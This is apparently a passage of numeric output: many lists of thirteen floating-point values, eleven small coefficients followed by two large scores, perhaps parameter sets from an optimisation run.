[6.393923513974502e-06, -1.4269415936091027e-12, -1.7684911527276688e-13, 5.480211712359269e-11, -7.243742739542879e-11, -1.1795054510279537e-15, 3.8683254669914693e-16, 2.7200371659468664e-05, -1.925930700762681e-06, -1.643396668485197e-08, 8.601004856702239e-10, 840789439847.5613, 886246867017.2574], [6.5292806963971566e-06, -1.2521788644307235e-12, -1.752024719240228e-13, 5.432423395298522e-11, -7.243160061946103e-11, -1.1728842336075722e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.9201275577069358e-06, -1.6042437181983083e-08, 8.613978338195112e-10, 1220087240914.9465, 1538404370735.8923], [7.222746286095911e-06, -1.4287928653696903e-12, -1.7798884315456173e-13, 5.47608522234827e-11, -7.177949793819456e-11, -1.1234835849356116e-15, 3.638627899273496e-16, 2.4725904181789833e-05, -1.7849753358990938e-06, -1.6004659818379623e-08, 9.095587982641099e-10, 1457214324700.6113, 3971854766728.4727]]
[1.5780628845471506e-10, -1.411490597458207e-12, -2.483949940281473e-13, 5.026488748046414e-11, -1.6612576871621329e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.404048022255995e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.489903548622118e-10, 102704594939.3429, 145011267381.10236]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 117267023779.58536, 138194745977.8172]
[6.483959591091273e-10, -1.5516831882387681e-12, -2.490649104258458e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.6989844545344268e-15, 8.109443782655016e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.514461873186105e-10, 81279986793.6045, 148499957167.59894]
[6.525636151737385e-10, -1.3197261044307544e-12, -2.4458923117817936e-13, 4.6265959327559024e-11, -1.6585443429963996e-10, -1.802849923078712e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.68878771600575e-08, 9.514461873186105e-10, 121168243931.69568, 138376625633.08905]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.59768924730343e-11, -1.6588127033784183e-10, -1.7924226413310876e-15, 9.085513864943156e-16, 2.3963751617497686e-05, -1.9859378185800262e-06, -1.6176901999289427e-08, 9.503282761551985e-10, 127284942067.54468, 147143586736.12967]
[6.525636151737385e-10, -1.5516831882387681e-12, -2.3065883936338436e-13, 4.6265959327559024e-11, -1.669670220497726e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.3963751617497686e-05, -1.9517021060346726e-06, -1.7031696163247858e-08, 9.514461873186105e-10, 165879895673.90985, 148817892429.6303]
[6.483959591091273e-10, -1.5516831882387681e-12, -2.477506624442777e-13, 5.026488748046414e-11, -1.669670220497726e-10, -1.7924226413310876e-15, 8.070333012129768e-16, 2.4138485475672502e-05, -1.9859378185800262e-06, -1.6108027319186075e-08, 9.514461873186105e-10, 78167992157.7952, 149819556305.94864]
[2.8389500911155237e-10, -1.3179669217824132e-12, -2.1290409882195637e-13, 5.0376537605765665e-11, -1.7763084077799175e-10, -1.8081388431942655e-15, 8.940150894056582e-16, 2.501288034169883e-05, -2.04721003e-06, -1.5842532923181598e-08, 9.632771875757591e-10, 108694336300.90585, 154375559012.27695]
[3.603083193105678e-11, -1.3197261044307544e-12, -2.213785963757499e-13, 4.581086934703742e-11, -1.6681614728164575e-10, -1.803564324024427e-15, 8.4683341745183045e-16, 2.4065016435368993e-05, -2.0711260096490455e-06, -1.7031696163247858e-08, 1.0052651438176042e-09, 98921398930.67514, 195080915978.15582]
[-2.0926038768787875e-10, -1.4706748741606338e-12, -2.3988654320236774e-13, 4.877026722101481e-11, -1.4519789238682426e-10, -1.8284483886533772e-15, 8.688144408462996e-16, 2.7398930354457147e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.90965422552221e-10, 100727388654.51337, 143318140783.98648]
[-2.0926038768787875e-10, -1.4706748741606338e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 112772825510.86789, 160453198244.84198]
[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.764041880667976e-11, -1.8918518378579712e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7122228639393258e-05, -1.8099079507631247e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 177535436392.6114, 109895891048.79645]
[-2.0926038768787875e-10, -1.6406892521440393e-12, -1.9531413192683389e-13, 4.85603371945204e-11, -1.450370910345386e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7370809361932293e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 8.935114691513575e-10, 150364957402.63327, 122880053749.32047]
[-8.223802918909379e-10, -1.4625176901480844e-12, -2.703868659848318e-13, 4.852404641399239e-11, -1.896863627503491e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.697391208672331e-05, -1.7223534426462784e-06, -1.7212440323693525e-08, 8.377481199786938e-10, 199237170018.58218, 130994741061.18477]
[-2.1118416643089627e-10, -1.459747004615292e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4471230416768517e-10, -1.9257301298903336e-15, 8.688144408462996e-16, 2.7267797101210102e-05, -1.8015495121292713e-06, -1.818410294118833e-08, 8.935114691513575e-10, 120611068648.22205, 148716985588.15564]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 190052435274.9098, 101545825010.15762]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8210829282495652e-15, 8.731899868495941e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 195239394048.3779, 101879284463.33914]
[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.88885, 102270797763.39908]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]
[-8.304227478096081e-10, -1.500986356346536e-12, -1.9531413192683389e-13, 4.7704075824842225e-11, -1.8975666267494283e-10, -1.9099300746589145e-15, 8.757096667187756e-16, 2.7122228639393258e-05, -1.809239966469619e-06, -1.8203397437532012e-08, 8.935114691513575e-10, 166731944707.48343, 109962566902.69849]
[-2.0926038768787875e-10, -1.3235354562894133e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.5027518840822802e-10, -1.9355556139972827e-15, 8.69779310515605e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.113315958572542e-10, 198705325524.15018, 111850971687.16727]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.858844276736905e-11, -1.5027518840822802e-10, -1.9257301298903336e-15, 8.765174154706532e-16, 2.507247127369048e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.134614417430693e-10, 152877011534.3794, 128488226222.4665]
[-8.325113652893972e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8226533446456543e-15, 8.718221314640016e-16, 2.471871023322042e-05, -1.788813296914756e-06, -1.836034443165441e-08, 9.148927620445716e-10, 115664967416.85544, 172987399752.44284]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]
[-8.372802930516975e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.765346456450067e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 191606485390.66824, 100937635343.36494]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.24603, 101440046940.62292]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 186125019263.05353, 101522685052.87083]
[-8.372413642600907e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.826770959894538e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.675713932751666e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 176424094355.21158, 102059630396.96977]
[-8.32774857282967e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.475667375214216e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7921694947468313e-06, -1.836034443165441e-08, 9.080472327376693e-10, 190619161162.84558, 102134941196.42899]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.835930442286039e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89273, 102270797763.3992]
[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9482957217087468e-13, 4.831070029448083e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.688144408462996e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 178582869424.89435, 102270797763.39929]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4446129047664535e-10, -1.8304219886094965e-15, 8.765174154706532e-16, 2.4857867004975476e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.087619653117874e-10, 191644867011.30374, 102518032445.5969]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.82400894161232e-11, -1.4446129047664535e-10, -1.8228595048374295e-15, 8.751158883884222e-16, 2.506841119647095e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 172947032775.99432, 102577021916.3392]
[-2.103367158359051e-10, -1.3359785407261977e-12, -1.9376482536341035e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 171732970643.1874, 106305215455.77405]
[-8.372413642600907e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8161784527844478e-08, 9.087619653117874e-10, 144963603428.97382, 112061347287.60056]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9412676391052573e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.5026084747023036e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.087619653117874e-10, 125853468889.92097, 136457449593.06062]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.937673308636816e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8210829282495652e-15, 8.765174154706532e-16, 2.4703687041471573e-05, -1.776082515662521e-06, -1.836034443165441e-08, 9.087619653117874e-10, 126137991779.33096, 160562679389.67618]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 183895104728.34744, 101215117638.35565]
[-2.0926038768787875e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11142, 101220474756.5564]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120635.11664, 101220474756.55742]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748451.4617, 101440046940.6675]
[-2.0969974314689316e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.52283, 101479475091.5385]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9531413192683389e-13, 4.8730627003901226e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.081976758127089e-10, 179897941081.58997, 101479475091.5439]
[-2.0926038768787875e-10, -1.6370065196284276e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.5149586855224063e-05, -1.8040587516026417e-06, -1.830053261436748e-08, 9.081976758127089e-10, 174674218067.03134, 101707557509.25955]
[-2.0780704759852712e-10, -1.3359785407261977e-12, -1.928247479392491e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.815489945689696e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.830053261436748e-08, 9.081976758127089e-10, 177564736843.2668, 101910116331.42278]
[-2.0926038768787875e-10, -1.3481496678499343e-12, -1.9612804716494087e-13, 4.869384519400452e-11, -1.4625361988654996e-10, -1.816149350524488e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, 101942928295.47075]
[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, 104790698646.6004]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8168585276282465e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10, 160649925757.17908, 106424978687.80653]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, 106648081137.30634]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, 106784848298.00577]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, 106918161793.97298]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, 117274357359.96004]
[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15, 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, 118996909122.33968]
[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, 125656067768.88814]
[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, 191438895729.71088]
[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, 98829512345.71223]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, 99223644222.007]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, 100125948657.42978]
[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, 100180028793.61896]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, 100223589650.82378]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, 100558408593.70113]
[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8877585360256924e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193351738763.71564, 100949387586.23102]
[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, 101220474756.86967]
[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, 101440046940.05927]
[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, 101467426817.57397]
[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, 4.8327983670281894e-11, -1.4675478300173032e-10, -1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10, 193392923341.53983, 101900620617.14302]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, 103131734300.077]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, 103180541968.40872]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15, 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, 103805616436.34537]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, 106843736334.12831]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, 110030788135.34956]
[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, 111006224451.55664]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, 113087422800.04585]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, 115101067854.69138]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, 126984206927.84627]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, 98138013390.26245]
[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, 98829512345.71414]
[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15, 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, 98891303611.42876]
[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, 99638222233.03885]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, 99962477826.90034]
[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, 100180028793.6191]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, 100290100926.3771]
[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15, 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, 100447140164.3877]
[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, 100872818268.9527]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15, 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, 101076246798.6337]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, 101683114493.3993]
[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, 105699410466.83022]
